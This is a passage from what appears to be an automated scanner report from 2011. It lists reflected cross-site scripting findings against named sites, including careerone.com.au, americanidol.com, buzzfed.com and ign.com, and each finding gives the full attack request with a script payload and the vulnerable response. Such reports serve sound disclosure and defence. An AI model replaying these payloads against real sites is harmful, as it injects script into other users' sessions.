Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=00038FE653150E8B59BFA3C561626364; LE4=RqrYE1+59N+31+5; LE1=nUsYE1+4GlH+31+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 04 Oct 2011 20:16:46 GMT
X-DirectServer: DS3
Content-Type: text/html
Content-Length: 362
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=0003f40338cd0d3800000000/acc_random8f259"><script>alert(1)</script>4e431d63655=956894257036/SITE=3RD.BPPROMO.NRL.SPORT/AAMSZ=300x70/AREA=SPORT.NRL.HOME/POSITION=BLW1" target="_new">
...[SNIP]...

1.61. http://media.sensis.com.au/hserver/acc_random=956894257036/SITE=3RD.BPPROMO.NRL.SPORT/AAMSZ=300x70/AREA=SPORT.NRL.HOME/POSITION=BLW1 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=956894257036/SITE=3RD.BPPROMO.NRL.SPORT/AAMSZ=300x70/AREA=SPORT.NRL.HOME/POSITION=BLW1

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 303c3"><script>alert(1)</script>c0139512324 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver/acc_random=956894257036/SITE=3RD.BPPROMO.NRL.SPORT/AAMSZ=300x70/AREA=SPORT.NRL.HOME/POSITION=BLW1?303c3"><script>alert(1)</script>c0139512324=1 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.nrl.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=00038FE653150E8B59BFA3C561626364; LE4=RqrYE1+59N+31+5; LE1=nUsYE1+4GlH+31+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 04 Oct 2011 20:16:38 GMT
X-DirectServer: DS3
Content-Type: text/html
Content-Length: 365
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=0003f40338cd0d3800000000/acc_random=956894257036/SITE=3RD.BPPROMO.NRL.SPORT/AAMSZ=300x70/AREA=SPORT.NRL.HOME/POSITION=BLW1?303c3"><script>alert(1)</script>c0139512324=1" target="_new">
...[SNIP]...

1.62. http://my.careerone.com.au/services/adservices/getcommonadurl.ashx [applicationid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.careerone.com.au
Path:   /services/adservices/getcommonadurl.ashx

Issue detail

The value of the applicationid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9e520"%3balert(1)//60325d708b3 was submitted in the applicationid parameter. This input was echoed as 9e520";alert(1)//60325d708b3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /services/adservices/getcommonadurl.ashx?applicationid=www9e520"%3balert(1)//60325d708b3&path=homepage HTTP/1.1
Host: my.careerone.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.careerone.com.au/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: split_scsjsv=26; WT_FPC=id=10.5.199.242-3607297344.30180036:lv=1317810158620:ss=1317810158620

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: CP=CAO DSP COR CURa ADMa DEVa TAIa IVAa IVDa CONo HISa TELo PSAa PSDa DELa UNRa PUBi OTRa BUS LEG PHY ONL UNI PUR COM NAV INT DEM CNT STA HEA PRE GOV OTC
Date: Tue, 04 Oct 2011 20:07:32 GMT
Content-Length: 174

_s.ads.jsAdController.setAdSource("http://ads.monster.com/html.ng/site=auen&affiliate=auen&app=www9e520";alert(1)//60325d708b3&size=0x0&path=homepage&tile=ed68aeacfb0e4cec");

1.63. http://my.careerone.com.au/services/adservices/getcommonadurl.ashx [path parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.careerone.com.au
Path:   /services/adservices/getcommonadurl.ashx

Issue detail

The value of the path request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5c5d5"%3balert(1)//83ab68a2ab0 was submitted in the path parameter. This input was echoed as 5c5d5";alert(1)//83ab68a2ab0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /services/adservices/getcommonadurl.ashx?applicationid=www&path=homepage5c5d5"%3balert(1)//83ab68a2ab0 HTTP/1.1
Host: my.careerone.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.careerone.com.au/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: split_scsjsv=26; WT_FPC=id=10.5.199.242-3607297344.30180036:lv=1317810158620:ss=1317810158620

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: CP=CAO DSP COR CURa ADMa DEVa TAIa IVAa IVDa CONo HISa TELo PSAa PSDa DELa UNRa PUBi OTRa BUS LEG PHY ONL UNI PUR COM NAV INT DEM CNT STA HEA PRE GOV OTC
Date: Tue, 04 Oct 2011 20:07:46 GMT
Content-Length: 174

_s.ads.jsAdController.setAdSource("http://ads.monster.com/html.ng/site=auen&affiliate=auen&app=www&size=0x0&path=homepage5c5d5";alert(1)//83ab68a2ab0&tile=09446f654f884dc2");

1.64. http://myidol.americanidol.com/ie7-styles.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://myidol.americanidol.com
Path:   /ie7-styles.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b5314'><script>alert(1)</script>7a8b247438e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /ie7-styles.cssb5314'><script>alert(1)</script>7a8b247438e?ver=1236 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: myidol.americanidol.com

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Expires: Tue, 04 Oct 2011 21:32:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:32:10 GMT
Content-Length: 1325
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Whoops! Browser Settin
...[SNIP]...
<a href='http://myidol.americanidol.com/ie7-styles.cssb5314'><script>alert(1)</script>7a8b247438e?ver=1236'>
...[SNIP]...

1.65. http://myidol.americanidol.com/images/css/newforum.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://myidol.americanidol.com
Path:   /images/css/newforum.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1227c'><script>alert(1)</script>7251447615 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /images/css/newforum.css1227c'><script>alert(1)</script>7251447615?ver=1010 HTTP/1.1
Host: myidol.americanidol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://widgets.myidol.americanidol.com/tools/keyslave.one?url=aHR0cDovL3dpZGdldHMubXlpZG9sLmFtZXJpY2FuaWRvbC5jb20vcmVkaXJlY3Qub25lP3JlZGlyZWN0X3RvPWh0dHA6Ly93d3cuYW1lcmljYW5pZG9sLmNvbS8.%2527&core_u=faa976043c793de66165b83afd81de19&core_x=3e3d8fc3a1227dd8404b22789c1bc64d&ts=1317758762
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2745A99E051D1536-4000010A2004AB28[CE]; __utma=124250778.1498354944.1317753547.1317756115.1317758789.3; __utmz=124250778.1317758789.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; s_pers=%20s_vnum%3D1320123600884%2526vn%253D3%7C1320123600884%3B%20s_invisit%3Dtrue%7C1317760745107%3B%20s_dayslastvisit%3D1317758945123%7C1412366945123%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760745123%3B

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Expires: Tue, 04 Oct 2011 21:23:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:23:19 GMT
Content-Length: 1333
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Whoops! Browser Settin
...[SNIP]...
<a href='http://myidol.americanidol.com/images/css/newforum.css1227c'><script>alert(1)</script>7251447615?ver=1010'>
...[SNIP]...

1.66. http://myidol.americanidol.com/images/webfontkit/helveticaneuew02-75bold-webfont.woff [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://myidol.americanidol.com
Path:   /images/webfontkit/helveticaneuew02-75bold-webfont.woff

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload acb1a'><script>alert(1)</script>9093560950c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /images/webfontkit/helveticaneuew02-75bold-webfont.woffacb1a'><script>alert(1)</script>9093560950c HTTP/1.1
Host: myidol.americanidol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://widgets.myidol.americanidol.com/tools/keyslave.one?url=aHR0cDovL3dpZGdldHMubXlpZG9sLmFtZXJpY2FuaWRvbC5jb20vcmVkaXJlY3Qub25lP3JlZGlyZWN0X3RvPWh0dHA6Ly93d3cuYW1lcmljYW5pZG9sLmNvbS8.%2527&core_u=faa976043c793de66165b83afd81de19&core_x=3e3d8fc3a1227dd8404b22789c1bc64d&ts=1317758762
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2745A99E051D1536-4000010A2004AB28[CE]; __utma=124250778.1498354944.1317753547.1317756115.1317758789.3; __utmz=124250778.1317758789.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; s_pers=%20s_v18_stack%3D%255B%255B'D%25253Dc18'%252C'1317763429285'%255D%255D%7C1475616229285%3B%20s_vnum%3D1320123600884%2526vn%253D4%7C1320123600884%3B%20s_invisit%3Dtrue%7C1317765229287%3B%20s_dayslastvisit%3D1317763429291%7C1412371429291%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317765229291%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20c_m%3Dundefinedburpburp%3B%20s_sq%3D%3B

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Expires: Tue, 04 Oct 2011 21:23:29 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:23:29 GMT
Content-Length: 1356
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Whoops! Browser Settin
...[SNIP]...
<a href='http://myidol.americanidol.com/images/webfontkit/helveticaneuew02-75bold-webfont.woffacb1a'><script>alert(1)</script>9093560950c'>
...[SNIP]...

1.67. http://myidol.americanidol.com/png_fix.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://myidol.americanidol.com
Path:   /png_fix.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6b3dd'><script>alert(1)</script>ad5d2697bb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /png_fix.css6b3dd'><script>alert(1)</script>ad5d2697bb?ver=1 HTTP/1.1
Host: myidol.americanidol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://widgets.myidol.americanidol.com/tools/keyslave.one?url=aHR0cDovL3dpZGdldHMubXlpZG9sLmFtZXJpY2FuaWRvbC5jb20vcmVkaXJlY3Qub25lP3JlZGlyZWN0X3RvPWh0dHA6Ly93d3cuYW1lcmljYW5pZG9sLmNvbS8.%2527&core_u=faa976043c793de66165b83afd81de19&core_x=3e3d8fc3a1227dd8404b22789c1bc64d&ts=1317758762
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2745A99E051D1536-4000010A2004AB28[CE]; __utma=124250778.1498354944.1317753547.1317756115.1317758789.3; __utmz=124250778.1317758789.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; s_pers=%20s_vnum%3D1320123600884%2526vn%253D3%7C1320123600884%3B%20s_invisit%3Dtrue%7C1317760745107%3B%20s_dayslastvisit%3D1317758945123%7C1412366945123%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760745123%3B

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Expires: Tue, 04 Oct 2011 21:23:14 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:23:14 GMT
Content-Length: 1318
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Whoops! Browser Settin
...[SNIP]...
<a href='http://myidol.americanidol.com/png_fix.css6b3dd'><script>alert(1)</script>ad5d2697bb?ver=1'>
...[SNIP]...

1.68. http://myidol.americanidol.com/tiny-edit.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://myidol.americanidol.com
Path:   /tiny-edit.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload fea64'><script>alert(1)</script>d9bb724dfee was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /tiny-edit.cssfea64'><script>alert(1)</script>d9bb724dfee?ver=1 HTTP/1.1
Host: myidol.americanidol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://widgets.myidol.americanidol.com/tools/keyslave.one?url=aHR0cDovL3dpZGdldHMubXlpZG9sLmFtZXJpY2FuaWRvbC5jb20vcmVkaXJlY3Qub25lP3JlZGlyZWN0X3RvPWh0dHA6Ly93d3cuYW1lcmljYW5pZG9sLmNvbS8.%2527&core_u=faa976043c793de66165b83afd81de19&core_x=3e3d8fc3a1227dd8404b22789c1bc64d&ts=1317758762
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2745A99E051D1536-4000010A2004AB28[CE]; __utma=124250778.1498354944.1317753547.1317756115.1317758789.3; __utmz=124250778.1317758789.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; s_pers=%20s_vnum%3D1320123600884%2526vn%253D3%7C1320123600884%3B%20s_invisit%3Dtrue%7C1317760745107%3B%20s_dayslastvisit%3D1317758945123%7C1412366945123%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760745123%3B

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Expires: Tue, 04 Oct 2011 21:23:14 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:23:14 GMT
Content-Length: 1321
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Whoops! Browser Settin
...[SNIP]...
<a href='http://myidol.americanidol.com/tiny-edit.cssfea64'><script>alert(1)</script>d9bb724dfee?ver=1'>
...[SNIP]...

1.69. http://pglb.buzzfed.com/32418/5cca846e8e7b10d1bec731ed34643e04 [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pglb.buzzfed.com
Path:   /32418/5cca846e8e7b10d1bec731ed34643e04

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload cb42d<script>alert(1)</script>34a3eaad9a8 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /32418/5cca846e8e7b10d1bec731ed34643e04?callback=BF_PARTNER.gate_responsecb42d<script>alert(1)</script>34a3eaad9a8&cb=9694 HTTP/1.1
Host: pglb.buzzfed.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.askmen.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=ISO-8859-1
Server: lighttpd
Content-Length: 79
Cache-Control: max-age=604800
Expires: Tue, 11 Oct 2011 20:11:28 GMT
Date: Tue, 04 Oct 2011 20:11:28 GMT
Connection: close

BF_PARTNER.gate_responsecb42d<script>alert(1)</script>34a3eaad9a8(1271435081);

1.70. http://pglb.buzzfed.com/32418/774318d75531cfaededa3a9d2cbab383 [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pglb.buzzfed.com
Path:   /32418/774318d75531cfaededa3a9d2cbab383

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload d68f9<script>alert(1)</script>3dce0ab26ea was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /32418/774318d75531cfaededa3a9d2cbab383?callback=BF_PARTNER.gate_responsed68f9<script>alert(1)</script>3dce0ab26ea&cb=2778 HTTP/1.1
Host: pglb.buzzfed.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.askmen.com/top_10/cars/fastest-cars-in-the-world.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=ISO-8859-1
Server: lighttpd
Content-Length: 79
Cache-Control: max-age=604791
Expires: Tue, 11 Oct 2011 20:19:42 GMT
Date: Tue, 04 Oct 2011 20:19:51 GMT
Connection: close

BF_PARTNER.gate_responsed68f9<script>alert(1)</script>3dce0ab26ea(1317659916);

1.71. http://pglb.buzzfed.com/39698/6d0094ff6569058b09e6fab4d74b9fcb [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pglb.buzzfed.com
Path:   /39698/6d0094ff6569058b09e6fab4d74b9fcb

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 9e793<script>alert(1)</script>ec1ef213b74 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /39698/6d0094ff6569058b09e6fab4d74b9fcb?callback=BF_PARTNER.gate_response9e793<script>alert(1)</script>ec1ef213b74&cb=7694 HTTP/1.1
Host: pglb.buzzfed.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.thedailybeast.com/company/about-us.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=ISO-8859-1
Server: lighttpd
Content-Length: 79
Cache-Control: max-age=604797
Expires: Tue, 11 Oct 2011 22:19:54 GMT
Date: Tue, 04 Oct 2011 22:19:57 GMT
Connection: close

BF_PARTNER.gate_response9e793<script>alert(1)</script>ec1ef213b74(1313768178);

1.72. http://pglb.buzzfed.com/39698/6f8f1f6be3a9e039f40348adbcc25b28 [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pglb.buzzfed.com
Path:   /39698/6f8f1f6be3a9e039f40348adbcc25b28

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 3bb62<script>alert(1)</script>362eec90e89 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /39698/6f8f1f6be3a9e039f40348adbcc25b28?callback=BF_PARTNER.gate_response3bb62<script>alert(1)</script>362eec90e89&cb=7926 HTTP/1.1
Host: pglb.buzzfed.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.thedailybeast.com/articles/2011/10/04/the-simpsons-money-dispute-may-shut-down-fox-tv-s-long-running-hit.html?cid=askmentrade
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=ISO-8859-1
Server: lighttpd
Content-Length: 79
Cache-Control: max-age=604775
Expires: Tue, 11 Oct 2011 20:18:08 GMT
Date: Tue, 04 Oct 2011 20:18:33 GMT
Connection: close

BF_PARTNER.gate_response3bb62<script>alert(1)</script>362eec90e89(1317701498);

1.73. http://pglb.buzzfed.com/39698/f959d1ec5ce0f34205021b068f0f6899 [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pglb.buzzfed.com
Path:   /39698/f959d1ec5ce0f34205021b068f0f6899

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 8220a<script>alert(1)</script>fcd595438a2 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /39698/f959d1ec5ce0f34205021b068f0f6899?callback=BF_PARTNER.gate_response8220a<script>alert(1)</script>fcd595438a2&cb=1779 HTTP/1.1
Host: pglb.buzzfed.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.thedailybeast.com/company/contact-us.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=ISO-8859-1
Server: lighttpd
Content-Length: 79
Cache-Control: max-age=604800
Expires: Tue, 11 Oct 2011 22:17:32 GMT
Date: Tue, 04 Oct 2011 22:17:32 GMT
Connection: close

BF_PARTNER.gate_response8220a<script>alert(1)</script>fcd595438a2(1313768172);

1.74. http://social-services.ign.com/v1.0/social/rest/people/fedreg.150067215/@self [jsonp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://social-services.ign.com
Path:   /v1.0/social/rest/people/fedreg.150067215/@self

Issue detail

The value of the jsonp request parameter is copied into the HTML document as plain text between tags. The payload 5b910<script>alert(1)</script>c36337bda10 was submitted in the jsonp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1.0/social/rest/people/fedreg.150067215/@self?jsonp=jsonp13177588132575b910<script>alert(1)</script>c36337bda10&_=1317758816914 HTTP/1.1
Host: social-services.ign.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.ign.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
